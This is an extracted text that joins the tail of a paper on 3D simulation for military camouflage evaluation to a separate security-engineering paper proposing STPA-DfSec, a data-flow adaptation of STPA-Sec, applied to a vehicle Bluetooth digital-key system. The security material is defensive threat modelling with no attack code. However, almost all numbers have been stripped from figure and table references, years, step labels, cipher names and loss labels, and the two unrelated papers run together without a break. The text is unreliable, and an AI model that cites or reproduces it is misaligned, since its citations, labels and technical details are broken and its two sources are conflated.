one. figure . camouflage scene system interface. as can be seen from figure , the terrain model and object models established by this system are consistent with the features of the regional target background. the camouflaged simulated scene has high fidelity and a realistic appearance and is not easy to detect, which fully reflects the importance of visual simulation in camouflage. v. conclusion in this paper, we have improved the traditional engineering camouflage method through d scene simulation technology. we built an mfc-based vp visual simulation framework to model and render the terrain and objects of the target area and established a d, dynamic, high-fidelity camouflage simulation scene. the results show that the camouflage simulation scene designed in this paper visually and faithfully reproduces the effect of camouflage operations in the field, enhances the user's sense of immersion, and addresses the problem that camouflage effect evaluation in current military engineering depends mainly on field work. it provides an effective auxiliary measure for the evaluation of engineering camouflage effects and a good virtual simulation platform for the design of military engineering camouflage, and at the same time it helps to reduce the resource consumption of camouflage evaluation.
references
[ ] hu jianghua. camouflage technology[m]. beijing: national defence industry press, : - .
[ ] zhang l, han j y, zhang j, et al. research of program development technology of vega prime based on mfc framework[j]. fire control & command control, , ( ): - .
[ ] yao f f, liang q, xu r j, et al. study of three-dimensional virtual battlefield large terrain dynamically generated based on vega prime[j]. journal of system simulation, , ( ): - .
[ ] hu zi-nan, yu jin-song. research of software integrated technology of vega prime based on mfc programming framework[j]. journal of system simulation, , ( ): - .
[ ] wu g, tao j. d modeling of the relievo based on the computer active vision[c]// international conference on mechatronics, computer and education informationization, .
[ ] liu p, lu z. construction and visualization of d landscape[c]// international conference on computer network, electronic and automation. ieee computer society, : - .
[ ] yu jun, shuang xiao. design of imitation digital camouflage[j]. journal of applied sciences, , ( ): - .
[ ] dong zhiming, guo qisheng. modeling and simulation of battlefield environment[m]. beijing: national defence industry press, : - .
[ ] yu jun, lu yanxin, hu zhiyi, et al. an improved bilinear interpolation of regular grid dem[j]. journal of geomatics science and technology, , ( ): - .
[ ] shao xiaodong. multigen creator modeling art[m]. xi'an: xidian university press, : - .
[ ] wang n, han y, chen g. comparison analysis of modeling of virtual gis based on ds max and multigen creator[j]. bulletin of surveying & mapping, , ( ): .
[ ] vega prime programmer's guide (version . )[z]. dallas: multigen-paradigm inc., : - .
[ ] wang xiaoping. vega prime real time d virtual reality development technology[m]. chengdu: southwest jiaotong university press, : - .
data-flow-based adaption of the system-theoretic process analysis for security (stpa-sec) jinghua yu, stefan wagner and feng luo school of automotive studies, tongji university, shanghai, china; institute of software engineering, university of stuttgart, stuttgart, germany abstract security analysis is an essential activity in security engineering to identify potential system vulnerabilities and specify security requirements in the early design phases. due to the increasing complexity of modern systems, traditional approaches lack the power to identify insecure incidents caused by complex interactions among physical systems, humans, and social entities. by contrast, the system-theoretic process analysis for security (stpa-sec) approach views losses as resulting from interactions, focuses on controlling system vulnerabilities instead of external threats, and is applicable to complex socio-technical systems. however, the stpa-sec pays less attention to non-safety but information-security issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. in this article, we propose a data-flow-based adaption of the stpa-sec (named stpa-dfsec) to overcome the mentioned limitations and elicit security constraints systematically. we use the stpa-dfsec and stpa-sec to analyze a vehicle digital key system and investigate the relationship and differences between both approaches, their applicability, and their highlights. to conclude, the proposed approach can identify information-related problems more directly from the data processing aspect.
as an adaption of the stpa-sec, it can be used with other stpa-based approaches to co-design systems in multi-disciplines under the unified stpa framework. subjects computer networks and communications, security and privacy, software engineering keywords security analysis, complex interaction, information-critical system, data flow structure, stpa-sec introduction system security is an emergent property of the system, which represents a state or condition that is free from asset loss and the resulting loss consequences. system security engineering, as a special discipline of system engineering, coordinates and directs various engineering specialties to provide a fully integrated, system-level perspective of system security and helps to ensure the application of appropriate security principles and methodologies during the system life cycle for asset protection (ross, mcevilley & oren, ). violating system security constraints causes unexpected incidents, like mission failure or leaking sensitive information, and finally leads to financial or even life losses. therefore, security needs to be considered carefully in system design. security requirement analysis, referring to the activity of analyzing systems in security-related aspects to
however, the stpa-sec does not consider non-safety but security-critical issues (e.g., data confidentiality) and lacks efficient guidance for identifying information security concepts. therefore, we propose a data-flow-based adaption of the stpa-sec (named stpa-dfsec) to overcome the mentioned stpa-sec’s limitations. the analysis process of a vehicle digital key system is presented to demonstrate how to use the proposed approach. we also analyze the same system by using the original stpa-sec and compare their outcomes. finally, we discover the relationship between concepts in both approaches and conclude the highlights and applicability of them. the rest of this article is organized as follows. in the “related work” section, we introduce the established approaches and the stpa series with research gaps. in the “methodology” section, we briefly describe the stpa and stpa-sec approaches and propose the adaption in detail. in the “case study” section, we present the analysis processes of an example case by using both original and adapted approaches to demonstrate how to use them and make the comparison. finally, we summary this article in the “conclusion” section. related work established security requirement analysis approaches we compare established approaches (other than the stpa-based ones) for security requirement analysis from several industry guidelines, like sae j (sae, ) in the automotive industry and nist cybersecurity framework for critical infrastructure (nist, ), as well as other published research. note that not all approaches use the term “requirements” explicitly. we regard all the activities that aim to identify security requirements as relevant approaches. for example, threat analysis and risk assessment (tara) is a typical activity for analyzing security problems. the outputs of tara are the yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ source of security requirements. table summarizes the investigated approaches with brief introductions and categories. with regard to the starting point, most of the mentioned approaches are threat- oriented. they start with identifying threat-related items (e.g., threat source or attack interface) of the system assets or operation scenarios. this is from the point of view of an attacker and aims to protect the system by analyzing and handling all enumerated external threats. another type is the system-oriented one, which starts with analyzing the system features (incl. structure, function or use case) and tries to find vulnerabilities of the system. threat-oriented approaches are well-structured and have been widely used in various industries. it is efficient to protect the system against known threats based on a threat database and expert experience. however, threat-oriented ways are not efficient for relatively new systems with less previous experience, and may overlook new kinds of threats. by contrast, the system-oriented approaches are more likely to handle such situations by identifying system vulnerabilities and focusing on controlling potential vulnerabilities relying less on the threat database. besides, since the external threats are continuously developing, the system-oriented ways are more efficient to ensure the system operation without being compromised regardless of the source and type of threats, just like defending a castle by reinforcing walls and not caring who is the enemy. 
furthermore, the system-oriented approaches are more useful for high-level decisions since they view the issues from the perspective of the whole system. table summary of established security analysis approaches other than stpa-based ones. brief introduction of established security analysis approaches (other than stpa-based ones) with their categories. approach brief introduction category nist cybersecurity framework method (nist, ) cybersecurity framework is a risk-based approach to managing cybersecurity risks of critical infrastructure published by the national institute of standards and technology (nist). five functions of the framework core are “identify”, “protect”, “detect”, “respond”, and “recover” threat-oriented; component-based evita tara process (ruddle et al., ) evita tara method was proposed in the e-safety vehicle intrusion protected applications (evita) project, which aims to design, verify, and prototype a secure architecture for automotive on-board networks threat-oriented; scenario-based tvra process (etsi, ) threat, vulnerabilities, and implementation risks analysis (tvra) is a process-driven tara methodology developed by the european telecommunications standards institute (etsi) threat-oriented; component-based octave allegro (caralli et al., ) octave allegro is a streamlined approach for information assets, as an agile variant of the operationally critical threat, asset, and vulnerability evaluation (octave), which was developed by the software engineering institute and sponsored by the u.s. department of defense threat-oriented; component-based heavens tara process (olsson, ) healing vulnerabilities to enhance software security and safety (heavens) is a systematic approach of deriving security requirements for vehicle e/e systems, including processes and tools supporting for tara threat-oriented; scenario-based fmvea (schmittner et al., ) failure mode, vulnerabilities and effects analysis (fmvea) is an approach evolved from the failure mode and effect analysis (fmea) to identify vulnerability cause-effect chains, which consists of vulnerabilities, threat agent, threat mode, threat effect, and attack probability threat-oriented; component-based chassis (raspotnig, karpati & katta, ) combined harm assessment of safety and security for information systems (chassis) is a unified process for identifying hazardous scenarios by using uml-based models (misuse cases and sequence diagrams) system-oriented; scenario-based yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ with regard to the basic analysis object, the mentioned approaches can also be divided into component-based and scenario-based classes. the former class views the system as the composition of a set of assets and aims to protect them to achieve the system security, while the latter class focuses on the functional operation of a system and aims to ensure the expected system behaviors. the component-based approaches can protect essential components well and are convenient for the development management since different teams can be responsible for certain components. however, such approaches lack the consideration of the interaction among components. each component can be secure but attacks may still happen during the interactions. by contrast, the scenario-based approaches consider the interaction among components and focus on providing secure services instead of protecting system components. 
such approaches require a global design consideration and more management efforts for cooperation between different development teams. the previously mentioned approaches are at the process or framework level. many concrete techniques are used in practice when applying these frameworks. for example, heavens and fmvea use microsoft’s stride model (microsoft, ) to identify potential threats. the attack tree analysis is used in the evita process to analyze attacks in depth and obtain attack scenarios (ruddle et al., ). the threat and operability analysis (throp) can be used in the threat identification phase when applying the evita process at the feature level (sae, ). since the proposed approach in this article is at the framework level, techniques used in certain steps are only listed here as examples without further investigation. system-theoretic process analysis based approaches and highlights stpa is a hazard analysis approach based on the system-theoretic accident model and process (stamp), which views losses as results from interactions among various system roles that lead to violations of safety constraints and analyzes issues at the strategy level. stpa provides a powerful way to deal with complexity by using traceable hierarchical abstraction and refinement (young & leveson, ). other than safety engineering, stpa has also been extended into other fields with the same system-theoretic thought. young & leveson ( ) presented stpa for security (stpa-sec), which shares similar steps with stpa and focuses on controlling system vulnerabilities instead of avoiding threats. to perform co-analysis of safety and security under the stpa framework better, friedberg et al. ( ) proposed a novel analysis methodology called stpa-safesec, which integrates stpa and stpa-sec into one concise framework and overcomes limitations of original approaches (e.g., no considerations about non-safety security issues) by introducing security constraints and mapping abstract control structures to real components. shapiro ( ) proposed stpa for privacy (stpa-priv), which extends stpa into privacy engineering by introducing privacy concepts and considerations into the general stpa process steps. the most significant highlight of stpa-based approaches is that they shift from focusing on preventing failures and avoiding threats to enforcing safety constraints and controlling system vulnerabilities. controlling system vulnerabilities rather than reacting yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ to threats is more efficient to ensure system security because controlling a vulnerability may reduce the attack risk of several threats. another highlight is that the stpa-based approaches focus more on the strategy level rather than the tactic level. the tactics are means to accomplish a specific action and are focused on physical threats, while the strategy is regarded as the art of gaining continuing advantages and is focused on abstract outcomes (young & leveson, ). the strategy view is beneficial to broaden the mind and take more aspects like organizational and managerial ones into account. therefore, the stpa-based approaches are applicable for socio-technical systems and suitable for today’s complex systems. not only physical system components but also humans, natural or social environment and their interactions are all within the scope of the stpa-based approaches. 
furthermore, due to the numbers of extensions of stpa in various disciplines, it is easier to perform co-design under the same stpa framework. stpa-sec applications and gaps the stpa-based security analysis approach (stpa-sec) has been used to identify system security constraints in various industries. khan, madnick & moulton ( ) demonstrated the implementation of stpa-sec to identify security vulnerabilities of a central utilities plant gas turbine use case in industrial control systems. mailloux et al. ( ) used the stpa-sec to elicit systems security requirements for a notional autonomous space system. carter et al. ( ) used stpa-sec with a previous information elicitation process to analyze a small reconnaissance unmanned aerial vehicles. a further modeling technique has also been proposed by the same researchers to support a more efficient and traceable analysis (carter et al., ). sidhu ( ) applied an stpa-sec extension with modified attack tree method to analyze cybersecurity of autonomous mining systems. wei & madnick ( ) analyzed an over-the-air software update use case in the automotive industry by using both stpa-sec and chassis and compared analysis outcomes. the stpa-sec is system-oriented and scenario-based. it has previously mentioned advantages of both system-oriented and scenario-based approaches. comparing to another system-oriented scenario-based approach chassis, the stpa-sec views the system from the perspective of the control actions and addresses more strategic issues, while the chassis analyzes the system from the functional use case aspects and pays more attention to tactical problems. besides, the chassis is more suitable for technical development phases since use cases and sequence diagrams are required when applying it. by contrast, stpa-sec can be performed at a high system level in the concept phase, in which fewer technical documents are available. nevertheless, two limitations of the stpa-sec have been found. first, it does not pay enough attention to the non-safety-related but security-critical issues, like data confidentiality. the first reason for causing such ignoring is that the security of the control action channels is not considered in the stpa-sec. for example, in a water cooling system, “increase the water flow” is a typical action to control the system temperature. the stpa-sec only analyzes insecure possibilities related to this action at a functional level but does not consider the possible insecure factors of the channels which deliver the yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ control information (or called commands) from the controller to the controlled process. another reason for ignoring some security aspects is that some objects, which are not related to the control process (i.e., not presented in the control loop structure (fig. )), are not considered. for example, in a vehicle software update system, “request” and “response” are the main control actions between the controller (e.g., an external tester) and the controlled process (e.g., electronic control units in a vehicle). the stpa-sec mainly focuses on factors that may lead to losses related to these two control actions (e.g., an illegal request is accepted or a valid response is dropped). however, whether the data during the request or response is monitored illegally can not be identified directly by the stpa-sec since the data confidentiality is not presented in the system stamp model. 
the second limitation is that it lacks guidance when identifying information- security-related concepts including insecure behaviors and intended causal scenarios. the stpa-sec inherits the stpa guide words to identify insecure control actions and uses components and interactions in the control loop as the “clues” to generate viable scenarios (young & leveson, ). such safety-oriented identification methods may not efficient and direct to address information security problems. other researchers also pointed out similar limitations of the stpa-sec. schmittner, ma & puschner ( ) reported that the original stpa-sec lacks guidance for intended causal scenarios, excludes considerations of the data exchange which is not directly connected to the process control and cannot cover more information-security centric properties such as confidentiality. torkildson, li & johnsen ( ) also found that some essential security issues can be overlooked and recommended to strengthen stpa-sec by combining it with data-flow-based threat models. however, torkildson’s approach converts the stpa control structure into a data flow diagram by simply replacing control action and feedback paths with data channels. although such a data flow diagram helps to identify more data-related threats than using stpa-sec alone, this diagram based on the original control loop does not view the system from the data aspect initially and may also overlook security issues that are not related to the control processes. controller controlled process control algorithm process model control actions feedback actuator sensor figure general control loop (karatzas & chassiakos, ). general control loop structure of the stpa framework. full-size doi: . /peerj-cs. /fig- yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ furthermore, the stpa-sec approach regards the security issue as one of the key threats affecting system safety (wei & madnick, ) and only supports the identification of safety-related security goals (martin et al., ). non-safety-related security issues like confidentiality may be overlooked. to sum up, the stpa-sec can address safety-related security problems, while the proposed stpa-dfsec reorients the scope of the stpa-based security analysis approach to consider more non-safety-related but information security problems. furthermore, efficient guidance is needed to better support such information security analysis based on the stpa framework. methodology brief introduction of stpa and stpa-sec we briefly introduce the original stpa framework as the basis of the proposed approach in this section. stpa starts with defining the purpose of the analysis, including system-level losses, hazards, and constraints. losses are about something valuable and unacceptable to the stakeholders. a hazard is a system state or set of conditions that, together with a particular set of worst-case environmental conditions, will lead to a loss. finally, system constraints can be derived from identified hazards, which specify system conditions or behaviors that need to be satisfied to prevent hazards and ultimately prevent losses (leveson & thomas, ). then, the control structure needs to be built to describe relationships and interactions by modeling the system as a set of control loops (show in fig. ). 
the third step is to identify unsafe control actions, which will lead to a hazard in a particular context and worst-case environment (leveson & thomas, ), based on the previously built structure. four ways of being unsafe are provided in stpa as guide words for the identification. finally, loss scenarios, which describe the causal factors that can lead to unsafe control actions, are identified. two types of loss scenarios must be considered, which are “scenarios that lead to unsafe control actions” and “scenarios in which control actions are improperly executed or not executed” (leveson & thomas, ). each identified scenario represents a system failure that needs to be controlled by designers. the stpa-sec, as an extension for security considerations, shares the same basic steps. vulnerabilities, instead of hazards, are identified in the first step since vulnerabilities lead to security incidents, which is just like hazards lead to safety incidents (young & leveson, ). similarly, final identified loss scenarios represent system vulnerabilities that need to be controlled. stpa-dfsec approach the proposed stpa-dfsec follows the general stpa framework but introduces a data-flow-based structure for information security considerations. the main steps are described as follows. yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ step : define the purpose of the analysis being similar to the stpa-sec, the first step is to identify system-level losses, vulnerabilities, and constraints to figure out what are unacceptable results that need to be avoided at the system strategy level. to help to identify losses, the stpa-dfsec provides general guidance for loss identification based on the study (yu & luo, ) of various safety- and security-related definitions from standards and technical documents in industries like iso (iso, ) and sae j guidebook (sae, ). all possibilities of losses at a high abstract level are listed in table . the loss list of a particular case is a subset of this general list and can be described concretely according to practical situations. vulnerabilities are system weaknesses that may lead to losses under external force. general security attributes like confidentiality, integrity, and availability (called c.i.a. triad model) can be used as guide words to classify the security problems and elicit potential vulnerabilities. finally, system-level constraints can be easily obtained by simply inversing the vulnerabilities or describing how to minimize the losses if the vulnerabilities are exploited (leveson & thomas, ). step : model functional interaction structure instead of the control structure, a functional interaction structure (fis) based on data flows is created to interpret how the system works from the perspective of data flows. we choose the data-flow-based diagram because data is the carrier of information. to view a system from the perspective of data flows is a more direct and efficient way to consider information security problems. a component can be decomposed into a set of functions. each function is a basic data process unit to handle the input data and output processed data. data flow channels are the bridges between different functions to exchange information to finally accomplish overall system missions. the interactions between fis components are viewed as the data exchanges between peer functions in different components. 
the data flow channels between different components are via the physical communication channels (e.g., cables and wireless channels), while the interactions among functions in one component go through the logical channels (e.g., via global variants and function parameters). a function works based on its inputs and algorithms and outputs results. the processing environment, together with inputs and algorithms, will affect function behaviors and final outputs. inputs and outputs, instead of control actions and feedback, table general list of losses. recommended high-level losses for the initial loss identification step. label loss description l- loss of life or cause injury to life includes human and animal life l- loss of physical property represents physical objects belonging to stakeholders (e.g., devices) l- loss of non-physical property represents virtual properties belonging to stakeholders (e.g., sensitive information, reputation) l- loss of environment includes the natural or artificial world yu et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ are interactions between components in fis. figure shows a general interaction structure with arrows as data flows and the elements of a function. the fis is created based on high-level system description files, which describe the overall system purpose, general architecture with main components, and functional requirements related to the data process. how concrete an fis is depends on how detailed the description files are. functions in an fis are identified from the perspective of the data process. a common function set (see table ) is provided to help the establishment of the system fis. the enumerated cryptography-related functions are derived from the cryptographer’s toolbox, which consists of six kinds of cryptography mechanisms (symmetric key algorithm, asymmetric key algorithm, message authentication code, digital signature, one-way hash function, and random number generation) (schneier, ). users can pick the enumerated functions to build their system fis at a general level or refine the function in particular cases if detailed information is available. other possible case-specific functions derived from the system descriptions can also be added to the structure. this function database can be extended and refined by the development team to make the database more practical for particular design domains. for example, the “transmit data to” function can be refined as “transmit data via can bus to” or “transmit data via wifi to” if the communication channel between components is known at this design stage. different communication media has different initial security vulnerabilities which can lead to further specific analysis. the “encrypt plain text by x” can be refined as “encrypt plain text by aes- -cbc algorithm” or “encrypt plain text by aes- -cbc function component bcomponent a algorithms function inputs outputs environment function a- function a- function b- function b- general fis figure general fis and its basic element “function”. general functional interaction structure of the proposed approach and the details of its basic element (called “function”). full-size doi: . /peerj-cs. /fig- table enumerated common functions for fis. enumeration of commonly used functions in the functional interaction structure, including data process and communication functions and cryptography- related functions. 
table enumerated common functions for the fis (commonly used functions, including data process and communication functions and cryptography-related functions):
- data process and communication functions: process plain data; transmit data to; receive data from; validate received data (according to specifications, e.g., format and value range)
- cryptography-related functions: encrypt plain text by x; decrypt cipher text by x; calculate signature; validate signature; calculate mac; validate mac; other functions (e.g., key-management-related functions, depending on the available information)

for example, the “transmit data to” function can be refined as “transmit data via can bus to” or “transmit data via wifi to” if the communication channel between components is known at this design stage. different communication media have different initial security vulnerabilities, which can lead to further, more specific analysis. likewise, the “encrypt plain text by x” function can be refined to name a concrete cipher, e.g., “encrypt plain text by aes- -cbc algorithm”. the execution times of these functions differ and should be considered when identifying timing-related losses. therefore, through such refinement, analysts can further consider the security vulnerabilities related to concrete function characteristics (e.g., the transmission medium or the cryptographic algorithm) and finally obtain more specific outcomes. note that when identifying functions and their interactions, analysts only need to focus on the system function aspect. potential attributes of functions or interactions, like real-time capacity, do not need to be considered in this step. possible threats to system security caused by such attributes will be addressed in later steps. for example, we do not consider real-time performance when constructing an fis; however, insecure functional behavior related to the poor real-time capacity of a function or interaction will be identified later by using the guide word “being executed but exceeding the time limits causing vulnerabilities”.

step : identify insecure function behaviors
from the established fis, insecure function behaviors (ifb), which are behaviors that will lead to a system vulnerability in a particular context like a worst-case environment, can be identified with the help of guide words. the template below (table ) is used for identifying ifbs with guide words (gw) adapted from the stpa unsafe control action (uca) guide words. for identifying “not being executed causes vulnerabilities” ifbs, it is helpful to consider whether a function could be bypassed or rejected while pretending to have been executed correctly. for identifying “being executed causes vulnerabilities” ifbs, the possible weaknesses of the function execution conditions (e.g., inputs and execution context) are considered. for “being executed but exceeding time limits causes vulnerabilities” ifbs, whether a timeout will lead to vulnerabilities is taken into account. how detailed an ifb description is depends on the available information; in any case, the analysis can be done with basic system information at a high system level.

step : identify loss scenarios
finally, loss scenarios (ls), as possible causes of ifbs, are identified. the guide words for identifying lss are proposed based on the basic elements of a function. the second template below (table ) is used for identifying lss with two classes of guide words: the “function itself” class helps to identify loss scenarios with causes from the function side, while the “execution environment (env)” class refers to loss scenarios caused by external factors.
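before filling in the templates below, the guide words can be applied mechanically; the following sketch (python, illustrative only; the label pattern follows the notation used later in the case study) pairs every function with the three ifb guide words to produce labelled candidates for the analyst to keep or discard.

```python
# illustrative guide-word enumeration for ifb candidates.
IFB_GUIDE_WORDS = [
    "not being executed causes vulnerabilities (NECV)",
    "being executed causes vulnerabilities (ECV)",
    "being executed but exceeding time limits causes vulnerabilities (ETL)",
]
# loss-scenario guide words applied per candidate ifb in the next step
LS_GUIDE_WORDS = ["function itself",
                  "env: function inputs", "env: calling behaviors",
                  "env: computing resources", "env: links"]

def candidate_ifbs(subject, functions):
    # yield a placeholder label per (function, guide word) pair
    for i, fn in enumerate(functions, start=1):
        for j, gw in enumerate(IFB_GUIDE_WORDS, start=1):
            yield f"{subject}_func{i}_ifb{j}", fn, gw

for label, fn, gw in candidate_ifbs("phone", ["encrypt data by S's public key"]):
    print(label, "->", fn, "|", gw)
```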
table template for identifying ifbs (insecure function behaviors identified per function with three guide words; s_fn_ifbm is the ifb label, in which s represents the subject of the function). example entries for an “encrypt data” function:
- gw “not being executed causes vulnerabilities (necv)”: the function is bypassed but returns a fake ok result (adapted from the stpa uca guide word “not providing causes hazard”)
- gw “being executed causes vulnerabilities (ecv)”: data is encrypted by a forged key provided by the attacker (adapted from the stpa uca guide word “providing causes hazard”)
- gw “being executed but exceeding time limits causes vulnerabilities (etl)”: data encryption violates the process time limit (adapted from the stpa uca guide words “too early, too late, out of order” and “stopped too soon, applied too long”)

table template for identifying lss (loss scenarios identified per ifb with five guide words: “function itself”, “env: function inputs”, “env: calling behaviors”, “env: computing resources”, and “env: links”). example entries:
- ifb “encryption process violates the time limits”: function itself - the process algorithm is modified, which leads to the timeout; function inputs - the input size exceeds the limits but is not detected; calling behaviors - /; computing resources - the computing resources are occupied by others maliciously; links - /
- ifb “data leaks in the transmission”: function itself - no or inadequate anti-leakage mechanism is used; function inputs - /; calling behaviors - /; computing resources - /; links - the transmission channel is monitored illegally

each loss scenario represents a system vulnerability that should be controlled by designers or operators. detailed system constraints can also be derived from loss scenarios by inverting the conditions of the loss scenarios or by defining what the system must do in case the incident occurs. system constraints are inputs for further design phases.

summary
the table below summarizes the process steps of both the stpa-dfsec and the stpa-sec and highlights their differences, in which “+” denotes added features of the stpa-dfsec and “*” denotes steps modified in comparison with the original stpa-sec.

table summary of stpa-dfsec and stpa-sec steps:
- step : define the purpose of the analysis. stpa-dfsec: identify system-level losses, vulnerabilities, and constraints; link vulnerabilities with corresponding losses and security attributes+; a general losses list is provided+. stpa-sec: identify system-level losses, vulnerabilities, and constraints.
- step : model the system structure. stpa-dfsec: model the system by a functional interaction structure based on data flows*; a common function set for the fis is provided+. stpa-sec: model the system by a functional control structure based on the control loop.
- step : identify insecure items. stpa-dfsec: use adapted guide words* (“not being executed”, “being executed”, and “being executed but exceeding the time limits”) to identify insecure function behaviors. stpa-sec: use guide words (“not providing”, “providing”, “too early, too late, out of order”, “stopped too soon, applied too long”) to identify insecure control actions.
- step : identify loss scenarios. stpa-dfsec: use adapted guide words* (“function itself”, “execution environment (incl. function inputs, calling behaviors, computing resources, and links)”) to identify loss scenarios. stpa-sec: use guide words (“unsafe controller behavior”, “inadequate feedback and information”, “involving the control path”, “related to the controlled process”) to identify loss scenarios.

case study
use case definition and assumptions
in this section, a bluetooth digital key system of a vehicle is introduced as a toy example. it consists of three main physical components and aims to lock or unlock the vehicle doors via a smartphone. communication between the different entities over wireless channels is protected by cryptographic mechanisms. the high-level sequence diagram of the two main services, as the input of the analysis, is shown in fig. to describe how the system works.
the asymmetric key algorithm is used in the communication with the cloud server, and the symmetric algorithm is used in the data transmission between the smartphone and the door controller. the research question in this case is: what are the security requirements of such an information-security-critical system? in this example, we assume that the connections between components have been established but are not ensured to be secure, and that the public and secret keys required for the cryptographic algorithms have been prepared in advance. in this research, we only focus on security issues, which means that the system can work properly without intended external disturbances; system development errors and random hardware failures are out of scope.

analysis by stpa-dfsec
the stpa-dfsec analysis of the example system is presented in this section.

figure: sequence diagram of the example system. sequence diagram of the two services of the example system, “user register or login” and “lock or unlock doors”.

in step , the system-level losses (l) are first identified according to the provided general losses list (table ) as well as the purpose and functionalities defined in the system specification. then, vulnerabilities at the system level are considered. in this case, we use the c.i.a. security attributes (i.e., confidentiality, integrity, and availability) as identification guide words to identify vulnerabilities in these three aspects. the related security attributes, together with the linked losses, are listed in brackets after the vulnerability descriptions. finally, we convert the vulnerabilities into system constraints by directly inverting the vulnerable situations and describing what should be done if the vulnerability is exploited. all the identified system-level losses, vulnerabilities, and constraints are listed below (table ).

table losses, vulnerabilities, and constraints of the use case (trace information in brackets):
- l- : loss of physical property (incl. the vehicle and properties in it)
- l- : loss of non-physical property (incl. the manufacturer’s reputation and intellectual property)
- v- : doors can be controlled by invalid users without being detected by valid users (e.g., a thief opens the door without being noticed) [l- / , integrity]
- v- : doors cannot be controlled by valid users (e.g., the car owner cannot lock the door when parking) [l- , availability]
- v- : sensitive information (e.g., the communication protocol and personal data) is leaked [l- , confidentiality]
- sc- : doors should not be controllable by invalid users [v- ]
- sc- : if doors are controlled by invalid users, this must be detected and recovered [v- ]
- sc- : doors should always be controllable by valid users [v- ]
- sc- : if doors cannot be controlled by valid users, this should be fixed within an acceptable period [v- ]
- sc- : sensitive information should be protected from leakage [v- ]
- sc- : if sensitive information is leaked, it should be detected and reactions need to be taken to minimize losses [v- ]

in step , the functional interaction structure is created based on the system data flows (shown in fig. ). we pick general functions from the proposed function database (table ), add some specific information related to this concrete system, and link them with data flow arrows based on the system sequence diagram (fig. ).
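as a concrete reference while building the fis, the following toy sketch (python) replays the “lock or unlock doors” exchange from the sequence diagram; the function names, the string-based “signature”, and the session-key handling are placeholders of our own and not the system's real protocol or cryptography.

```python
# highly simplified replay of the sequence-diagram flow; not the real protocol.
import secrets

class CloudServer:
    def __init__(self):
        self.registered_phones = {"phone-001"}   # assumed registration record
        self.assigned_keys = {}                  # session keys handed to door controllers

    def request_session_key(self, phone_id, signature):
        # "verify signature, generate a session key for the communication"
        if phone_id not in self.registered_phones or signature != f"sig({phone_id})":
            raise PermissionError("invalid signature or unregistered phone")
        session_key = secrets.token_hex(16)
        self.assigned_keys[phone_id] = session_key   # "assign the session key" to the door controller
        return session_key

class DoorController:
    def __init__(self, server, phone_id):
        self.session_key = server.assigned_keys[phone_id]   # "get the session key"
        self.locked = True

    def execute(self, protected_command):
        # toy symmetric protection: accept only commands wrapped with the shared session key
        prefix = f"{self.session_key}:"
        if not protected_command.startswith(prefix):
            raise PermissionError("command not protected by the shared session key")
        self.locked = (protected_command[len(prefix):] == "lock")
        return self.locked

server = CloudServer()
key = server.request_session_key("phone-001", "sig(phone-001)")  # smartphone requests a session key
door = DoorController(server, "phone-001")
print(door.execute(f"{key}:unlock"))   # False -> doors are now unlocked
```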
in contrast to most traditional approaches, this analysis includes participants (the user and the manufacturer) outside the physical system boundary. functions performed by a human or the manufacturer can also be refined into more detailed actions like “make a decision”, “press a button”, or “manage the passwords”. since we mainly focus on the physical part in this analysis, human actions are simplified into a single “human operation” function. in step , insecure function behaviors are identified by using the proposed guide words for each function. to increase the readability of this example case, the ifb labels of this demonstration are created in the form “subjectname_func%d_ifb%d” (%d represents a number). for example, the first identified ifb of a function is notated as “phone_func _ifb ” (or “p_f _ifb ” for short, as presented in the template (table )). identified ifbs of an example function are shown in table . in step , we consider the potential causes of the previously obtained ifbs with the help of the guide words and possible previous experience to identify the loss scenarios of each ifb. similarly, ls notations are created in the form “subjectname_func%d_ifb%d_ls%d” (%d represents a number). for example, “phone_func _ifb _ls ” (or “p_f _ifb _ls ” for short, as presented in the template (table )) is the notation of the first loss scenario of the ifb labeled “phone_func _ifb ”. examples of lss related to the ifbs in table are listed in table .
table identified insecure function behavior examples (identified ifbs of the example function phone_func , “encrypt data by s’s public key”):
- phone_func _ifb (necv): data is not encrypted, but the function pretends to have been executed correctly [v- / ]
- phone_func _ifb (ecv): data is encrypted by a forged public key [v- / ]
- phone_func _ifb (ecv): data is encrypted with malicious algorithms [v- / ]
- phone_func _ifb (etl): the encryption process takes too long and violates the protocol time limits, which aborts the expected mission [v- ]

figure: functional interaction structure based on data flows. functional interaction structure of the example case, including five system components (smartphone, cloud server, door controller, user, and manufacturer) and their data flow interactions.

table loss scenarios of ifbs (identified loss scenarios of the ifbs listed above, classified under the “function itself” and “environment” guide-word classes):
- phone_func _ifb _ls : the function is bypassed but returns a fake ok result
- phone_func _ifb _ls : the valid key is replaced by a forged one
- phone_func _ifb _ls : the algorithm is maliciously modified by the attacker
- phone_func _ifb _ls : the algorithm is maliciously modified by the attacker, which requires more computing resources
- phone_func _ifb _ls : the input length exceeds the limitation but is not detected
- phone_func _ifb _ls : computing resources are occupied by others maliciously

analysis by stpa-sec
we also analyzed the example system with the stpa-sec. due to the same system model, the system-level losses, vulnerabilities, and constraints are the same as those in the stpa-dfsec analysis. therefore, the work here starts with drawing the system control structure shown in fig. , after which insecure control actions (ica) are identified. examples of icas are shown in table , in which the first letter of the label represents the controller of the control action. finally, the loss scenarios of each ica are identified; examples of lss are shown in table .

figure: control structure of the system. control structure of the example case, including five system components and their control loop interactions.
table identified insecure control actions (identified icas of the example action phone_ctrlaction , “smartphone registers at the server”, i.e., the smartphone sends the account id, the password, and the smartphone’s public key to the server):
- gw “not providing causes vulnerability”: phone_ctrlaction _insec : the smartphone does not register at the server correctly [v- ]
- gw “providing causes vulnerability”: phone_ctrlaction _insec : registration is done successfully, but sensitive information (account id and password) is leaked [v- ]
- gw “timing issues cause vulnerability”: /
